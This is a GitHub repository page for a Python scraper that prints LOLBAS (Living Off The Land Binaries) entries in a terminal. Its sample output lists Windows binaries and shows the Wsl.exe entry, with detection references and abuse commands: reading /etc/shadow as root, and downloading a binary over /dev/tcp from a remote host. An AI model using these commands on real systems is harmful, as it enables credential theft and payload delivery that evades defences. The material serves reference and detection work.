Skip to content

0bfxgh0st/lolbas-webcrawler

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits

README.md

README.md

 
 

lolbas.py

lolbas.py

 
 

Repository files navigation

lolbas-webcrawler

Webscrapper written in python3 to show lolbas in a terminal

┌──(root💀ghost)-[/home/ghost]
└─# python3 lolbas.py


.____    ________  .____   __________    _____    _________
|    |   \_____  \ |    |  \______   \  /  _  \  /   _____/
|    |    /   |   \|    |   |    |  _/ /  /_\  \ \_____  \ 
|    |___/    |    \    |___|    |   \/    |    \/        \
|_______ \_______  /_______ \______  /\____|__  /_______  /
        \/       \/        \/      \/         \/        \/ 

Living Off The Land Binaries, Scripts and Libraries
For more info on the project, click on the logo.

If you want to contribute, check out our contribution guide. Our criteria list sets out what we define as a LOLBin/Script/Lib.

MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation. You can see the current ATT&CK® mapping of this project on the ATT&CK® Navigator.

If you are looking for UNIX binaries, please visit gtfobins.github.io.


[+] AppInstaller.exe
[+] Aspnet_Compiler.exe
[+] At.exe
[+] Atbroker.exe
[+] Bash.exe
[+] Bitsadmin.exe
[+] CertOC.exe
[+] CertReq.exe
[+] Certutil.exe
[+] Cmd.exe
[+] Cmdkey.exe
[+] cmdl32.exe
[+] Cmstp.exe
[+] ConfigSecurityPolicy.exe
[+] Conhost.exe
[+] Control.exe
[+] Csc.exe
[+] Cscript.exe
[+] CustomShellHost.exe
[+] DataSvcUtil.exe
[+] Desktopimgdownldr.exe
[+] DeviceCredentialDeployment.exe
[+] Dfsvc.exe
[+] Diantz.exe
[+] Diskshadow.exe
[+] Dnscmd.exe
[+] Esentutl.exe
[+] Eventvwr.exe
[+] Expand.exe
[+] Explorer.exe
[+] Extexport.exe
[+] Extrac32.exe
[+] Findstr.exe
[+] Finger.exe
[+] fltMC.exe
[+] Forfiles.exe
[+] Ftp.exe
[+] GfxDownloadWrapper.exe
[+] Gpscript.exe
[+] Hh.exe
[+] IMEWDBLD.exe
[+] Ie4uinit.exe
[+] Ieexec.exe
[+] Ilasm.exe
[+] Infdefaultinstall.exe
[+] Installutil.exe
[+] Jsc.exe
[+] Ldifde.exe
[+] Makecab.exe
[+] Mavinject.exe
[+] Microsoft.Workflow.Compiler.exe
[+] Mmc.exe
[+] MpCmdRun.exe
[+] Msbuild.exe
[+] Msconfig.exe
[+] Msdt.exe
[+] Mshta.exe
[+] Msiexec.exe
[+] Netsh.exe
[+] Odbcconf.exe
[+] OfflineScannerShell.exe
[+] OneDriveStandaloneUpdater.exe
[+] Pcalua.exe
[+] Pcwrun.exe
[+] Pktmon.exe
[+] Pnputil.exe
[+] Presentationhost.exe
[+] Print.exe
[+] PrintBrm.exe
[+] Psr.exe
[+] Rasautou.exe
[+] rdrleakdiag.exe
[+] Reg.exe
[+] Regasm.exe
[+] Regedit.exe
[+] Regini.exe
[+] Register-cimprovider.exe
[+] Regsvcs.exe
[+] Regsvr32.exe
[+] Replace.exe
[+] Rpcping.exe
[+] Rundll32.exe
[+] Runonce.exe
[+] Runscripthelper.exe
[+] Sc.exe
[+] Schtasks.exe
[+] Scriptrunner.exe
[+] Setres.exe
[+] SettingSyncHost.exe
[+] ssh.exe
[+] Stordiag.exe
[+] SyncAppvPublishingServer.exe
[+] Ttdinject.exe
[+] Tttracer.exe
[+] Unregmp2.exe
[+] vbc.exe
[+] Verclsid.exe
[+] Wab.exe
[+] winget.exe
[+] Wlrmdr.exe
[+] Wmic.exe
[+] WorkFolders.exe
[+] Wscript.exe
[+] Wsreset.exe
[+] wuauclt.exe
[+] Xwizard.exe
[+] fsutil.exe
[+] Advpack.dll
[+] Desk.cpl
[+] Dfshim.dll
[+] Ieadvpack.dll
[+] Ieframe.dll
[+] Mshtml.dll
[+] Pcwutl.dll
[+] Setupapi.dll
[+] Shdocvw.dll
[+] Shell32.dll
[+] Syssetup.dll
[+] Url.dll
[+] Zipfldr.dll
[+] Comsvcs.dll
[+] AccCheckConsole.exe
[+] adplus.exe
[+] AgentExecutor.exe
[+] Appvlp.exe
[+] Bginfo.exe
[+] Cdb.exe
[+] coregen.exe
[+] Createdump.exe
[+] csi.exe
[+] DefaultPack.EXE
[+] Devtoolslauncher.exe
[+] dnx.exe
[+] Dotnet.exe
[+] Dump64.exe
[+] Dxcap.exe
[+] Excel.exe
[+] Fsi.exe
[+] FsiAnyCpu.exe
[+] Mftrace.exe
[+] Msdeploy.exe
[+] MsoHtmEd.exe
[+] Mspub.exe
[+] msxsl.exe
[+] ntdsutil.exe
[+] Powerpnt.exe
[+] Procdump.exe
[+] ProtocolHandler.exe
[+] rcsi.exe
[+] Remote.exe
[+] Sqldumper.exe
[+] Sqlps.exe
[+] SQLToolsPS.exe
[+] Squirrel.exe
[+] te.exe
[+] Tracker.exe
[+] Update.exe
[+] VSIISExeLauncher.exe
[+] VisualUiaVerifyNative.exe
[+] vsjitdebugger.exe
[+] Wfc.exe
[+] Winword.exe
[+] Wsl.exe
[+] CL_LoadAssembly.ps1
[+] CL_Mutexverifiers.ps1
[+] CL_Invocation.ps1
[+] Manage-bde.wsf
[+] Pubprn.vbs
[+] Syncappvpublishingserver.vbs
[+] UtilityFunctions.ps1
[+] winrm.vbs
[+] Pester.bat

[(L0LBAS)]> Wsl.exe

[Execute]

Download

Windows subsystem for Linux executable

Paths:

C:\Windows\System32\wsl.exe

Resources:

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

Acknowledgements:

Alex Ionescu (@aionescu)

Matt (@NotoriousRebel1)

Asif Matadar (@d1r4c)

Detection:

Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_wsl_lolbin.yml

BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

IOC: Child process from wsl.exe

[Execute]

wsl.exe -e /mnt/c/Windows/System32/calc.exe

wsl.exe -u root -e cat /etc/shadow

wsl.exe --exec bash -c 'cat file'

Download

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'

Or

┌──(root💀ghost)-[/home/ghost]
└─# python3 lolbas.py Wsl.exe  

                                                                                                                                                                                                   
.____    ________  .____   __________    _____    _________                                                                                                                                        
|    |   \_____  \ |    |  \______   \  /  _  \  /   _____/                                                                                                                                        
|    |    /   |   \|    |   |    |  _/ /  /_\  \ \_____  \                                                                                                                                         
|    |___/    |    \    |___|    |   \/    |    \/        \                                                                                                                                        
|_______ \_______  /_______ \______  /\____|__  /_______  /                                                                                                                                        
        \/       \/        \/      \/         \/        \/                                                                                                                                         
                                                                                                                                                                                                   
Living Off The Land Binaries, Scripts and Libraries                                                                                                                                                
For more info on the project, click on the logo.                                                                                                                                                   
                                                                                                                                                                                                   
If you want to contribute, check out our contribution guide. Our criteria list sets out what we define as a LOLBin/Script/Lib.                                                                     
                                                                                                                                                                                                   
MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation. You can see the current ATT&CK® mapping of this project on the ATT&CK® Navigator.                                    
                                                                                                                                                                                                   
If you are looking for UNIX binaries, please visit gtfobins.github.io.                                                                                                                             
                                                                                                                                                                                                   
                                                                                                                                                                                                   
[Execute]

Download

Windows subsystem for Linux executable

Paths:

C:\Windows\System32\wsl.exe

Resources:

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

Acknowledgements:

Alex Ionescu (@aionescu)

Matt (@NotoriousRebel1)

Asif Matadar (@d1r4c)

Detection:

Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_wsl_lolbin.yml

BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

IOC: Child process from wsl.exe

[Execute]

wsl.exe -e /mnt/c/Windows/System32/calc.exe

wsl.exe -u root -e cat /etc/shadow

wsl.exe --exec bash -c 'cat file'

Download

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'

About

Webscrapper written in python3 to show lolbas in a terminal.

Topics

lolbas lolbas-webcrawler lolbas-webscrapper

Resources

Readme
Activity

Stars

5 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages